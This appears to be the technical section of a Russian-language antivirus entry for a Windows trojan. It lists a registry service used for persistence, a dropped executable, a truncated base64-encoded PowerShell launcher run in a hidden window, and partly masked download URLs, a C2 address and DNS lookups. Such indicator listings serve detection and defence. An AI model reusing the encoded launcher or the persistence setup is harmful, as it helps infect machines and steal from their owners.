Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\cryptxml] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\cryptxml] 'ImagePath' = '"%WINDIR%\SysWOW64\hnetcfg\cryptxml.exe"'
- 'cryptxml' "%WINDIR%\SysWOW64\hnetcfg\cryptxml.exe"
- 'cryptxml' %WINDIR%\SysWOW64\hnetcfg\cryptxml.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...
- %HOMEPATH%\133.exe
- %HOMEPATH%\133.exe
- %HOMEPATH%\133.exe в %WINDIR%\syswow64\hnetcfg\cryptxml.exe
- %HOMEPATH%\133.exe
- '12#.#5.106.173':443
- http://me##nor.gr/docs/q75cvd/
- http://bn##ati.ir/8iujk/b0/
- http://da####somoy24.com/be53np0/IlLy/
- http://12#.##.106.173:443/coz3YzcvS/dbBvZKurovphH7/ftWXhc5m0/Q0H6POZi7BNvdoBCh/ via 12#.#5.106.173
- DNS ASK te###hint.com
- DNS ASK or#######onale.metodoinforma.it
- DNS ASK me##nor.gr
- DNS ASK bn##ati.ir
- DNS ASK da####somoy24.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)